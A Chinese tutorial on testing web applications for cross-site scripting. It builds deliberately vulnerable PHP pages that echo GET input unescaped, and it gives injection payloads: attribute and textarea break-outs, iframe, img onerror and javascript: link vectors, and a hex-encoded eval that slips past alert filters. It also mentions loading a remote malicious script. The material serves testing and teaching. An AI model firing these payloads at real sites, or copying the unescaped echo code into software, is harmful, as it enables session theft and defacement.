安全测试 web应用安全测试之XXS跨站脚本攻击检测

web应用安全测试之XXS跨站脚本攻击检测

by:授客 QQ：1033553122

说明

意在对XSS跨站脚本攻击做的简单介绍，让大家对xss攻击有个初步认识，并能够在实际工作当中运用本文所述知识做些简单的、基础性的XSS攻击检测。

定义

XSS攻击：类似sql注入，简单说，通过“HTML注入”，把用户输入的数据当作脚本执行。进而达到想要的目的，这种目的通常是恶意。

分类

反射型XSS（非持久型XSS）：

简单说可充当执行脚本的恶意数据，需由用户从“外部”输入，通过提交输入的方式“嵌入”到网页。

简单举例：

针对存在XSS攻击的某个网页输入框中输入“恶意数据”，并提交，通常，这类提交操作对应着一个get请求，当我们把这个请求发送给其他用户，并让用户在web浏览器中打开请求，这时就会把恶意数据当作脚本再次执行

存储型XSS(持久型XSS)

类似反射型XSS,不同的是，其“恶意数据”本身就是包含在网页源码中、或者自动从服务器内部读取并“嵌入”网页中。

简单举例：

黑客在某个论坛写了一篇文章，并在文章中写入了用会充当脚本执行的数据，比如一段恶意javascript代码，这样所有浏览该文章的用户，都会自动在其浏览器中执行这段恶意代码。

DOM Bsed XSS

通过修改页面的DOM节点型的XSS，效果上来说也是发射型XSS

举例：

略，参靠下述实验

XSS检测

实验1

构造testxss.php，内容如下

说明：

$xss =
empty($_GET['xss_input']) ? '':$_GET['xss_input'];
#使用前做判断，防止报类似如下错误：

Notice:
Undefined index: xss_input  in xxx\xx.php on line
xxx
报错

$_GET

变量是一个数组，元素索引和元素值分别是由 HTTP GET
方法发送的变量名称和值。

$_GET

变量用于收集来自 method="get"

的表单中的值。

请求上述testxss.php文件，并在打开页面的输入框中输入测试数据

输入测试数据：
“shouke”，提交查询，结果如下：

说明：正常情况如上，用户输入的数据不被当作脚本执行，用于但不局限于在浏览器端展示

输入测试数据：
，提交查询，结果如下：

说明：非正常情况如上，用户输入的数据被当作脚本执行，说明存在xss攻击

实验2

构造testxss2.php，内容如下

请求上述testxss2.php文件，并在打开页面的输入框中输入测试数据

第一个输入框中输入测试数据："><!--

第二个输入框中输入测试数据：--><script>alert('xss')</script>

提交查询，结果如下

查看执行后展示页面的源代码

说明：如上，第三、第四个输入框分别从第一个和第二个输入框获中取值，获取后如下

<input type="text" value=""><!--">

<br>

<input type="text" value="--><script>alert('xss')</script>">

，显而易见，中间部分被当作注释掉了

实验3

构造testxss3.php，内容如下

构造testxss3.php，内容如下

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset="utf-8" />

<title>利用监听事件执行xss</title>

</head>

<body>

<form action="" method="get">

<input type="text" name="xss_input_value" value="输入要展示的字符">

<input type="submit">

</form>

<hr>

<?php

$xss = empty($_GET['xss_input_value']) ? '':$_GET['xss_input_value'];

if(isset($xss)){

echo '<input type="text" value="'.$xss.'">';

}else{

echo '<input type="type" value="输出">';

}

?>

</body>

</html>

请求上述testxss3.php文件，并在打开页面的输入框中输入测试数据

第一个输入框中输入测试数据：" onclick="alert('xss')

然后点击第二个输入框，结果如下

查看执行后展示页面的源代码

如上，提交后，第二个输入框源代码变成 了<input type="text" value="" onclick="alert('xss')">

注：

1、监听事件处理onclick之外，还有别的mouseover等

2、这也说明，input的value是默认值，仅初始化时会加载，对其所做的修改并不会在html页面显示，上例中，第一个输入框输入的值仅在被第二框作为默认值获取时，才产生xss

实验4

构造testxss4.php，内容如下

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset="utf-8" />

<title>解决textarea无法执行script xss</title>

</head>

<body>

<form action="" method="get">

<input type="text" name="xss_input_value" value="输入要展示的字符">

<input type="submit">

</form>

<hr>

<textarea rows=2 cols=50 name="textarea">

<?php

$xss = empty($_GET['xss_input_value']) ? '':$_GET['xss_input_value'];

echo $xss;

?>

</textarea>

</body>

</html>

请求上述testxss4.php文件，并在打开页面的输入框中输入测试数据

第一个输入框中输入测试数据：<script>alert('xss')</script>，提交查询，结果，没发现弹窗。

第一个输入框中输入测试数据：</textarea><script>alert('xss')</script>，提交查询，结果如下：

查看执行后展示页面的源代码

注：textarea标签可定义多行的文本输入控件，正常情况下无法执行javascript，通过上述方式可执行xss攻击

其它

除了上述所举，我们还可以通过其它构造方式，比如<iframe>，<img>，<a>标签构造用户输入数据，比如<img/src=# onerror=alert("test")>，当图片载入错误时执行弹窗，以执行xss

注意：onerror事件会在文档或图像加载过程中发生错误时被触发,有时候直接填写<script>alter("test")</script>不起作用时，可以尝试该方式。

构造testxss.php，内容如下

<html>

<head>

<meta http-equiv="Content-Type" content="text/html";charset=utf-8 />

<title>study xss</title>

</head>

<body>

<form action="" method="get">

<input type="text" name="xss_input">

<input type="submit">

</form>

<hr>

<?php

$xss = empty($_GET['xss_input']) ? '':$_GET['xss_input'];

echo '输入的字符为: '.$xss;

?>

</body>

</html>

访问上述页面，分别输入以下数据，提交测试，查看效果

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗

<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗

<a href=javascript:alert('xss')>s</a> 点击s时运行alert('xss')

总结

如上所举例，实际运用时，还得根据实际环境，构造适当的“输入数据”来进行测试,方能达到预期效果。

注意：上述所例，仅是测试xss存在的可能性，是我们检测xss的手段，并不等同xss。如果存在xss漏洞，我们可以用它来执行其它更具备破坏性的操作，比如输入恶意数据，执行恶意js脚本：

<script scr="js_url"></script>

pdf版下载：web应用安全测试之XXS跨站脚本攻击检测.pdf